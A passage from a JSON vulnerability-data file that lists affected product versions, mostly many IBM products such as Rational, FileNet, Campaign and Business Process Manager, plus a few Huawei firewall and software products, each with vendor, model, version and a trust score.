            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.4"
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.3"
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.2"
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.1"
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.16"
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.1.2"
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.02"
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.01"
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.6"
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.0.1"
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.1.5"
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.1.4"
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.1.3"
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.1"
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "rational software architect design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.3"
          },
          {
            "_id": null,
            "model": "rational software architect design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.2"
          },
          {
            "_id": null,
            "model": "rational software architect design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.1"
          },
          {
            "_id": null,
            "model": "rational software architect design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.1"
          },
          {
            "_id": null,
            "model": "rational software architect design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.01"
          },
          {
            "_id": null,
            "model": "rational software architect design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.6"
          },
          {
            "_id": null,
            "model": "rational software architect design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.5"
          },
          {
            "_id": null,
            "model": "rational software architect design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.4"
          },
          {
            "_id": null,
            "model": "rational software architect design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.0"
          },
          {
            "_id": null,
            "model": "rational software architect design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "rational software architect design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.0"
          },
          {
            "_id": null,
            "model": "rational software architect design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "rational rhapsody design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.4"
          },
          {
            "_id": null,
            "model": "rational rhapsody design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.3"
          },
          {
            "_id": null,
            "model": "rational rhapsody design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.2"
          },
          {
            "_id": null,
            "model": "rational rhapsody design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.1"
          },
          {
            "_id": null,
            "model": "rational rhapsody design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.6"
          },
          {
            "_id": null,
            "model": "rational rhapsody design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.5"
          },
          {
            "_id": null,
            "model": "rational rhapsody design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "rational rhapsody design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.1"
          },
          {
            "_id": null,
            "model": "rational rhapsody design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.0.1"
          },
          {
            "_id": null,
            "model": "rational rhapsody design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "rational requirements composer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.5"
          },
          {
            "_id": null,
            "model": "rational requirements composer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.4"
          },
          {
            "_id": null,
            "model": "rational requirements composer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.3"
          },
          {
            "_id": null,
            "model": "rational requirements composer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.1"
          },
          {
            "_id": null,
            "model": "rational requirements composer ifix1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.16"
          },
          {
            "_id": null,
            "model": "rational requirements composer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.16"
          },
          {
            "_id": null,
            "model": "rational requirements composer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.1.2"
          },
          {
            "_id": null,
            "model": "rational requirements composer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.04"
          },
          {
            "_id": null,
            "model": "rational requirements composer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.02"
          },
          {
            "_id": null,
            "model": "rational requirements composer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.01"
          },
          {
            "_id": null,
            "model": "rational requirements composer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.6"
          },
          {
            "_id": null,
            "model": "rational requirements composer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.2"
          },
          {
            "_id": null,
            "model": "rational requirements composer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.0.2"
          },
          {
            "_id": null,
            "model": "rational requirements composer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.0.1"
          },
          {
            "_id": null,
            "model": "rational requirements composer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.0"
          },
          {
            "_id": null,
            "model": "rational requirements composer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "rational requirements composer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.1"
          },
          {
            "_id": null,
            "model": "rational requirements composer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "rational requirements composer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.0.0.3"
          },
          {
            "_id": null,
            "model": "rational requirements composer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "rational engineering lifecycle manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.5"
          },
          {
            "_id": null,
            "model": "rational engineering lifecycle manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.4"
          },
          {
            "_id": null,
            "model": "rational engineering lifecycle manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.3"
          },
          {
            "_id": null,
            "model": "rational engineering lifecycle manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.6"
          },
          {
            "_id": null,
            "model": "rational engineering lifecycle manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.0.0.1"
          },
          {
            "_id": null,
            "model": "rational engineering lifecycle manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.0"
          },
          {
            "_id": null,
            "model": "rational doors next generation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.5"
          },
          {
            "_id": null,
            "model": "rational doors next generation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.4"
          },
          {
            "_id": null,
            "model": "rational doors next generation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.3"
          },
          {
            "_id": null,
            "model": "rational doors next generation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.2"
          },
          {
            "_id": null,
            "model": "rational doors next generation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.1"
          },
          {
            "_id": null,
            "model": "rational doors next generation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.6"
          },
          {
            "_id": null,
            "model": "rational doors next generation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.0"
          },
          {
            "_id": null,
            "model": "operational decision manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.2"
          },
          {
            "_id": null,
            "model": "operational decision manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5"
          },
          {
            "_id": null,
            "model": "operational decision manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "operational decision manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5"
          },
          {
            "_id": null,
            "model": "operational decision manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1"
          },
          {
            "_id": null,
            "model": "omnifind enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.1"
          },
          {
            "_id": null,
            "model": "lotus widget factory",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "0"
          },
          {
            "_id": null,
            "model": "lotus mashups",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.0.1"
          },
          {
            "_id": null,
            "model": "lotus mashups",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.0.0.2"
          },
          {
            "_id": null,
            "model": "license metric tool",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5"
          },
          {
            "_id": null,
            "model": "license metric tool",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.2.2"
          },
          {
            "_id": null,
            "model": "interact",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.1"
          },
          {
            "_id": null,
            "model": "interact",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5"
          },
          {
            "_id": null,
            "model": "integration bus for z/os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.0.0.0"
          },
          {
            "_id": null,
            "model": "integration bus",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.0.0.0"
          },
          {
            "_id": null,
            "model": "initiate master data service",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.7"
          },
          {
            "_id": null,
            "model": "initiate master data service",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.5"
          },
          {
            "_id": null,
            "model": "initiate master data service",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.2"
          },
          {
            "_id": null,
            "model": "initiate master data service",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.1"
          },
          {
            "_id": null,
            "model": "initiate master data service",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "infosphere master data management server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.1"
          },
          {
            "_id": null,
            "model": "infosphere master data management server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "infosphere master data management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "11.0"
          },
          {
            "_id": null,
            "model": "infosphere mashuphub",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "infosphere mashuphub",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "infosphere guardium data redaction",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.5"
          },
          {
            "_id": null,
            "model": "business monitor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5.1"
          },
          {
            "_id": null,
            "model": "business monitor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5"
          },
          {
            "_id": null,
            "model": "forms server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0.1"
          },
          {
            "_id": null,
            "model": "forms server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.02"
          },
          {
            "_id": null,
            "model": "forms server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "forms server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "forms experience builder",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5"
          },
          {
            "_id": null,
            "model": "forms experience builder",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "flashsystem 9848-ae1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v840"
          },
          {
            "_id": null,
            "model": "flashsystem 9848-ac1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v840"
          },
          {
            "_id": null,
            "model": "flashsystem 9848-ac0",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v840"
          },
          {
            "_id": null,
            "model": "flashsystem 9846-ae1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v840"
          },
          {
            "_id": null,
            "model": "flashsystem 9846-ac1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v840"
          },
          {
            "_id": null,
            "model": "flashsystem 9846-ac0",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v840"
          },
          {
            "_id": null,
            "model": "flashsystem 9840-ae1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v840"
          },
          {
            "_id": null,
            "model": "flashsystem 9848-ae1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "840"
          },
          {
            "_id": null,
            "model": "flashsystem 9846-ae1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "840"
          },
          {
            "_id": null,
            "model": "flashsystem 9843-ae1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "840"
          },
          {
            "_id": null,
            "model": "flashsystem 9840-ae1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "840"
          },
          {
            "_id": null,
            "model": "flashsystem",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8400"
          },
          {
            "_id": null,
            "model": "filenet services for lotus quickr",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.1"
          },
          {
            "_id": null,
            "model": "filenet p8 application engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.2"
          },
          {
            "_id": null,
            "model": "filenet content manager workplace xt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.1.5"
          },
          {
            "_id": null,
            "model": "filenet content manager workplace xt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.1.4"
          },
          {
            "_id": null,
            "model": "filenet content manager workplace xt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.1.3"
          },
          {
            "_id": null,
            "model": "filenet content manager workplace xt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.1.2"
          },
          {
            "_id": null,
            "model": "filenet content manager workplace xt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.1.1"
          },
          {
            "_id": null,
            "model": "filenet content manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.2.0"
          },
          {
            "_id": null,
            "model": "filenet collaboration services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.0.2"
          },
          {
            "_id": null,
            "model": "filenet business process framework",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.1"
          },
          {
            "_id": null,
            "model": "endpoint manager for remote control",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.1.0"
          },
          {
            "_id": null,
            "model": "distributed marketing",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.1"
          },
          {
            "_id": null,
            "model": "distributed marketing",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "distributed marketing",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "db2 query management facility for websphere fix pack",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.122"
          },
          {
            "_id": null,
            "model": "db2 query management facility for websphere",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.1"
          },
          {
            "_id": null,
            "model": "db2 query management facility for websphere fix pack",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "11.11"
          },
          {
            "_id": null,
            "model": "db2 query management facility for websphere",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "11.1"
          },
          {
            "_id": null,
            "model": "db2 query management facility for websphere fix pack",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.19"
          },
          {
            "_id": null,
            "model": "db2 query management facility for websphere",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.1"
          },
          {
            "_id": null,
            "model": "dataquant",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.1.1"
          },
          {
            "_id": null,
            "model": "dataquant",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.2.19"
          },
          {
            "_id": null,
            "model": "content manager services for lotus quickr",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.1"
          },
          {
            "_id": null,
            "model": "content manager services for lotus quickr",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.0"
          },
          {
            "_id": null,
            "model": "content integrator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.1"
          },
          {
            "_id": null,
            "model": "content integrator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.6"
          },
          {
            "_id": null,
            "model": "content foundation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.2.0"
          },
          {
            "_id": null,
            "model": "content analytics with enterprise search",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "content analytics with enterprise search",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.2"
          },
          {
            "_id": null,
            "model": "connections",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "connections",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.5"
          },
          {
            "_id": null,
            "model": "connections",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "connections",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.1.1"
          },
          {
            "_id": null,
            "model": "connections",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.1.0"
          },
          {
            "_id": null,
            "model": "campaign",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.1"
          },
          {
            "_id": null,
            "model": "campaign",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "campaign",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.6"
          },
          {
            "_id": null,
            "model": "campaign",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5"
          },
          {
            "_id": null,
            "model": "campaign",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.3"
          },
          {
            "_id": null,
            "model": "campaign",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.2"
          },
          {
            "_id": null,
            "model": "campaign",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.1"
          },
          {
            "_id": null,
            "model": "campaign",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "campaign",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.6"
          },
          {
            "_id": null,
            "model": "campaign",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5"
          },
          {
            "_id": null,
            "model": "campaign",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.4"
          },
          {
            "_id": null,
            "model": "campaign",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.3"
          },
          {
            "_id": null,
            "model": "campaign",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.2"
          },
          {
            "_id": null,
            "model": "campaign",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1"
          },
          {
            "_id": null,
            "model": "campaign",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "c\u00faram social program management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0.5"
          },
          {
            "_id": null,
            "model": "c\u00faram social program management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0.4"
          },
          {
            "_id": null,
            "model": "c\u00faram social program management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0.3"
          },
          {
            "_id": null,
            "model": "c\u00faram social program management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0.2"
          },
          {
            "_id": null,
            "model": "c\u00faram social program management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.2.6"
          },
          {
            "_id": null,
            "model": "c\u00faram social program management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.2.5"
          },
          {
            "_id": null,
            "model": "c\u00faram social program management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.2.4"
          },
          {
            "_id": null,
            "model": "c\u00faram social program management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.2.1"
          },
          {
            "_id": null,
            "model": "c\u00faram social program management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.2"
          },
          {
            "_id": null,
            "model": "c\u00faram social program management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0.5.4"
          },
          {
            "_id": null,
            "model": "c\u00faram social program management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0.5.3"
          },
          {
            "_id": null,
            "model": "c\u00faram social program management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0.5.2"
          },
          {
            "_id": null,
            "model": "c\u00faram social program management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0.4.5"
          },
          {
            "_id": null,
            "model": "c\u00faram social program management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0.4.4"
          },
          {
            "_id": null,
            "model": "c\u00faram social program management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0.4.3"
          },
          {
            "_id": null,
            "model": "c\u00faram social program management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.5"
          },
          {
            "_id": null,
            "model": "business process manager standard",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.5"
          },
          {
            "_id": null,
            "model": "business process manager standard",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.0"
          },
          {
            "_id": null,
            "model": "business process manager standard",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "business process manager standard",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5.0"
          },
          {
            "_id": null,
            "model": "business process manager express",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.5"
          },
          {
            "_id": null,
            "model": "business process manager express",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.0"
          },
          {
            "_id": null,
            "model": "business process manager express",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0.0"
          },
          {
            "_id": null,
            "model": "business process manager express",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5.0"
          },
          {
            "_id": null,
            "model": "business process manager advanced on z/os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.0"
          },
          {
            "_id": null,
            "model": "business process manager advanced on z/os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0.0"
          },
          {
            "_id": null,
            "model": "business process manager advanced on z/os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5.0"
          },
          {
            "_id": null,
            "model": "business process manager advanced",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.5"
          },
          {
            "_id": null,
            "model": "business process manager advanced",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5"
          },
          {
            "_id": null,
            "model": "business process manager advanced",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0.0"
          },
          {
            "_id": null,
            "model": "business process manager advanced",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5.0"
          },
          {
            "_id": null,
            "model": "business monitor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0.1"
          },
          {
            "_id": null,
            "model": "usg9580 v200r001c00",
            "scope": null,
            "trust": 0.3,
            "vendor": "huawei",
            "version": null
          },
          {
            "_id": null,
            "model": "usg9560 v200r001c00",
            "scope": null,
            "trust": 0.3,
            "vendor": "huawei",
            "version": null
          },
          {
            "_id": null,
            "model": "usg9520 v200r001c00",
            "scope": null,
            "trust": 0.3,
            "vendor": "huawei",
            "version": null
          },
          {
            "_id": null,
            "model": "eudemon8000e-x8 v200r001c00",
            "scope": null,
            "trust": 0.3,
            "vendor": "huawei",
            "version": null
          },
          {
            "_id": null,
            "model": "eudemon8000e-x3 v200r001c00",
            "scope": null,
            "trust": 0.3,
            "vendor": "huawei",
            "version": null
          },
          {
            "_id": null,
            "model": "eudemon8000e-x16 v200r001c00",
            "scope": null,
            "trust": 0.3,
            "vendor": "huawei",
            "version": null
          },
          {
            "_id": null,
            "model": "espace meeting portal v100r001c00",
            "scope": null,
            "trust": 0.3,
            "vendor": "huawei",
            "version": null
          },
          {
            "_id": null,
            "model": "anyoffice v200r002c10spc500",
            "scope": null,
            "trust": 0.3,
            "vendor": "huawei",
            "version": null
          },
          {
